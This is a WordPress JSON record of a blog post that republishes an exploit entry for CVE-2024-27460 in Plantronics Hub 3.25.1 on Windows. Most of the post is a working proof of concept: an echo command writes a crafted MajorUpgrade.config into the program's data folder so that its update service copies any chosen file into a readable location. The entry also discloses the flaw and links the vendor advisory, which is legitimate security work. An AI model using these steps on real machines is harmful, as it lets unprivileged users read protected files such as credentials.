{"id":56833,"date":"2024-05-14T19:50:19","date_gmt":"2024-05-14T15:50:19","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178563\/plantronicshub3251-fileread.txt"},"modified":"2024-05-14T19:50:19","modified_gmt":"2024-05-14T15:50:19","slug":"plantronics-hub-3-25-1-arbitrary-file-read","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/plantronics-hub-3-25-1-arbitrary-file-read\/","title":{"rendered":"Plantronics Hub 3.25.1 Arbitrary File Read"},"content":{"rendered":"<p># Exploit Title: Plantronics Hub 3.25.1 \u2013 Arbitrary File Read<br \/># Date: 2024-05-10<br \/># Exploit Author: Farid Zerrouk from Deloitte Belgium, Alaa Kachouh from<br \/>Mastercard<br \/># Vendor Homepage:<br \/>https:\/\/support.hp.com\/us-en\/document\/ish_9869257-9869285-16\/hpsbpy03895<br \/># Version: Plantronics Hub for Windows version 3.25.1<br \/># Tested on: Windows 10\/11<br \/># CVE : CVE-2024-27460<\/p>\n<p>As a regular user drop a file called &#8220;MajorUpgrade.config&#8221; inside the<br \/>&#8220;C:\\ProgramData\\Plantronics\\Spokes3G&#8221; directory. The content of<br \/>MajorUpgrade.config should look like the following one liner:<br \/>^|^|&lt;FULL-PATH-TO-YOUR-DESIRED-FILE&gt;^|&gt; MajorUpgrade.config<\/p>\n<p>Exchange &lt;FULL-PATH-TO-YOUR-DESIRED-FILE&gt; with a desired file to read\/copy<br \/>(any file on the system). The desired file will be copied into C:\\Program<br \/>Files (x86)\\Plantronics\\Spokes3G\\UpdateServiceTemp<\/p>\n<p>Steps to reproduce (POC):<br \/>&#8211; Open cmd.exe<br \/>&#8211; Navigate using cd C:\\ProgramData\\Plantronics\\Spokes3G<br \/>&#8211; echo ^|^|&lt;FULL-PATH-TO-YOUR-DESIRED-FILE&gt;^|&gt; MajorUpgrade.config<br \/>&#8211; Desired file will be copied into C:\\Program Files<br \/>(x86)\\Plantronics\\Spokes3G\\UpdateServiceTemp<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Plantronics Hub 3.25.1 \u2013 Arbitrary File Read# Date: 2024-05-10# Exploit Author: Farid Zerrouk from Deloitte Belgium, Alaa Kachouh fromMastercard# Vendor Homepage:https:\/\/support.hp.com\/us-en\/document\/ish_9869257-9869285-16\/hpsbpy03895# Version: Plantronics Hub for Windows version 3.25.1# Tested on: Windows 10\/11# CVE : CVE-2024-27460 As a regular user drop a file called &#8220;MajorUpgrade.config&#8221; inside the&#8220;C:\\ProgramData\\Plantronics\\Spokes3G&#8221; directory. The content ofMajorUpgrade.config should look &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56833","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56833","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56833"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56833\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56833"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56833"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56833"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}